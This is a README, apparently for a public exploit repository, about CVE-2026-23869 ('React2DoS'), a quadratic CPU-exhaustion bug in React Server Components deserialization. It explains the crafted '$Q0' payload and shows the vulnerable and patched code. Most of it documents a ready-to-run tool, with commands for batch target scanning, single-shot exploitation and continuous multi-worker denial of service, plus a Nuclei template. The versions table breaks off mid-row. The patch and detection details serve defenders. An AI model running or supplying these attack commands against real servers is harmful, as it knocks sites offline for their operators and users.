Share
## https://sploitus.com/exploit?id=DECB45B5-1A4E-5D23-BA1B-91B8017D7984
โก CVE-2026-23869 โ React2DoS
Unauthenticated Remote Denial-of-Service via React Flight Protocol
Quadratic CPU Exhaustion in Server Components Map Deserialization
Overview โข
How It Works โข
Tools โข
Install โข
Usage โข
Nuclei โข
Fix โข
Disclaimer
---
## Vulnerability Overview
| Field | Detail |
|-------|--------|
| **CVE ID** | CVE-2026-23869 |
| **Alias** | React2DoS |
| **CVSS Score** | 7.5 (High) |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` |
| **CWE** | CWE-400 (Uncontrolled Resource Consumption) |
| **Type** | Unauthenticated Remote Denial of Service |
| **Discovered By** | Yohann Sillam (Imperva Threat Research) |
| **Affected** | `react-server-dom-webpack` / `parcel` / `turbopack` โค 19.2.4 |
| **Patched** | React 19.2.5+ / Next.js 15.5.15+ / 16.2.3+ |
A critical Denial-of-Service vulnerability exists in React Server Components' **Flight protocol** deserialization. An unauthenticated attacker can send a single crafted HTTP request to any Next.js App Router **Server Action** endpoint, causing **quadratic O(nยฒ) CPU exhaustion** that locks the server for minutes.
### References
- [Vercel Official Advisory](https://vercel.com/changelog/summary-of-cve-2026-23869)
- [Imperva Technical Analysis โ "React2DoS"](https://www.imperva.com/blog/react2dos-cve-2026-23869-when-the-flight-protocol-crashes-at-takeoff/)
- [React Patch PR #36236](https://github.com/facebook/react/pull/36236)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-23869)
---
## How It Works
### The Bug: Missing `consumed` Flag in Map Deserialization
React Flight protocol uses special markers to serialize data types. `$Q` represents a **Map** object. When the server receives a payload containing self-referencing `$Q0` markers:
```
Payload: [ [1,1], [1,1], ...(n valid entries)..., "$Q0", "$Q0", ...(n refs)... ]
```
**Each `$Q0`** triggers a `new Map()` constructor that iterates over **all n valid entries**. The Map constructor throws an error (because the entries are malformed), but the critical bug is: **the `consumed` flag is never set on failure**.
This means the **next `$Q0`** recomputes the exact same Map from scratch โ creating **O(nยฒ)** complexity:
```
n valid entries ร n $Q0 references = nยฒ Map constructor calls
Example: 65,000 ร 65,000 = 4,225,000,000 operations
Result: Single request locks CPU for 5-10+ minutes
```
### Attack Flow
```
โโโโโโโโโโโโ POST / (multipart/form-data) โโโโโโโโโโโโโโโโโโโโ
โ Attacker โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโถ โ Next.js Server โ
โ โ Header: Next-Action: โ โ
โ โ Body: [[1,1]...,"$Q0","$Q0"...] โ โโโโโโโโโโ CPU โ
โ โ โ 100% LOCKED โ
โโโโโโโโโโโโ โ for ~5-10 min โ
โโโโโโโโโโโโโโโโโโโโ
```
### Vulnerable Code (Before Fix)
```javascript
// ReactFlightReplyServer.js โ BEFORE patch
case "Q": {
const data = getOutlinedModel(response, id, obj);
return new Map(data); // โ Fails but doesn't set consumed = true
// Next $Q0 recomputes from scratch
}
```
### Patched Code (After Fix)
```javascript
// ReactFlightReplyServer.js โ AFTER patch (React 19.2.5+)
case "Q": {
const data = getOutlinedModel(response, id, obj);
obj.consumed = true; // โ Fix: set flag BEFORE construction
return new Map(data); // Prevents repeated recomputation
}
```
---
## Tools Included
| File | Description |
|------|-------------|
| `poc.py` | Full-auto exploit tool with 4-phase pipeline (Recon โ Extract โ Detect โ Exploit) |
| `CVE-2026-23869.yaml` | Nuclei detection template with flow-based orchestration |
| `scan.sh` | Wrapper script: httpx live filtering + nuclei scanning |
| `extract-action-ids.sh` | Standalone Server Action ID extractor |
---
## Installation
```bash
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2026-23869-Expolit.git
cd CVE-2026-23869-Expolit
# Install Python dependency
pip install requests
# Make scripts executable
chmod +x poc.py scan.sh extract-action-ids.sh
```
### Optional Dependencies
```bash
# For Nuclei template scanning
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# For live target filtering
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
```
---
## Usage
### ๐ฅ Full Auto Scan (Single Target)
Just give the URL โ the tool does everything automatically:
```bash
python3 poc.py -u https://target.com
```
**What happens:**
1. **Phase 1 โ Recon:** Fingerprints Next.js (headers, HTML markers, build ID)
2. **Phase 2 โ Extract:** Finds Server Action IDs from JS bundles
3. **Phase 3 โ Detect:** Safe timing-based vulnerability check (500-entry probe)
4. **Phase 4 โ Report:** Shows vulnerability verdict with timing analysis
### ๐ Batch Scan (Multiple Targets)
```bash
# Scan a list of domains/IPs
python3 poc.py -L targets.txt
# With JSON report output
python3 poc.py -L targets.txt -o results.json
```
### ๐ฏ Manual Mode (Known Action ID)
```bash
# Safe detection only
python3 poc.py -u https://target.com -a --detect
# Single-shot exploit
python3 poc.py -u https://target.com -a --single
# Continuous DoS (10 workers)
python3 poc.py -u https://target.com -a --exploit -w 10
```
### ๐ Extract Action IDs Only
```bash
python3 poc.py -u https://target.com --extract
```
### โ๏ธ All Options
```
Options:
-u, --url URL Target URL (single target)
-L, --list FILE File with target URLs/IPs (one per line)
-a, --action-id ID Server Action ID (skip auto-extraction)
--detect Detection only โ safe, non-destructive (default)
--single Single-shot exploit after detection
--exploit Continuous DoS after detection
--extract Only extract action IDs
-l, --length N Payload entries (default: 130000)
-w, --workers N Concurrent workers (default: 5)
-d, --delay SEC Delay between requests (default: 1.0)
-o, --output FILE Save JSON report
-t, --threads N Concurrent targets for list scan (default: 3)
```
### Backward Compatibility
The original PoC syntax still works:
```bash
python3 poc.py
```
---
## Nuclei Template
### Quick Scan
```bash
# Single target
nuclei -t ./CVE-2026-23869.yaml -u https://target.com -itags dos
# Multiple targets
nuclei -t ./CVE-2026-23869.yaml -l targets.txt -itags dos
# Clean output (only vulnerable results)
nuclei -t ./CVE-2026-23869.yaml -l targets.txt -itags dos -silent
```
> **Note:** The `-itags dos` flag is **required** because Nuclei excludes DoS templates by default for safety.
### Template Detection Flow
```
Request 1 (GET /) โ Fingerprint Next.js (headers + HTML markers)
Request 2 (GET /) โ Extract Server Action IDs from createServerReference()
Request 3 (POST /) โ Baseline timing request (benign payload)
Request 4 (POST /) โ Exploit probe (250 valid + 250 $Q0 entries)
โโ If response time โฅ 3s โ VULNERABLE
```
### Auto Scanner Script
```bash
# Runs httpx โ filters live targets โ nuclei scan โ results
./scan.sh
# Or specify custom files
./scan.sh targets1.txt targets2.txt
```
---
## Detection Logic
The tool uses **timing-based detection** to safely identify vulnerable servers:
| Metric | Vulnerable | Patched |
|--------|-----------|---------|
| Baseline (benign request) | ~0.1-0.5s | ~0.1-0.5s |
| Probe (500 entries) | **3-10+ seconds** | ~0.1-0.5s |
| Ratio (Probe/Baseline) | **>5x** | ~1x |
| Full payload (130K entries) | **5-10+ minutes** | ~0.1-0.5s |
A detection is confirmed when:
- Probe response time **โฅ 3 seconds**, OR
- Probe/Baseline ratio **> 5x** with probe time **> 1 second**
---
## Affected Versions
| Package | Vulnerable | Fixed |
|---------|-----------|-------|
| `react-server-dom-webpack` | โค 19.2.4 | 19.2.5+ |
| `react-server-dom-parcel` | โค 19.2.4 | 19.2.5+ |
| `react-server-dom-turbopack` | โค 19.2.4 | 19.2.5+ |
| Next.js | **โ ๏ธ FOR AUTHORIZED SECURITY TESTING ONLY**
>
> This tool is provided for **educational purposes** and **authorized penetration testing** only. Unauthorized use of this tool against targets you do not own or have explicit permission to test is **illegal** and may violate computer fraud laws (CFAA, CMA, etc.).
>
> The authors are not responsible for any misuse or damage caused by this tool. Always obtain proper written authorization before testing any systems.
---
## Credits
- **Vulnerability Research:** [Yohann Sillam](https://www.imperva.com/blog/react2dos-cve-2026-23869-when-the-flight-protocol-crashes-at-takeoff/) โ Imperva Threat Research
- **PoC Development:** [cybertechajju](https://github.com/cybertechajju)
- **React Patch:** [Facebook/Meta React Team](https://github.com/facebook/react/pull/36236)
---
If you find this useful, consider giving it a โญ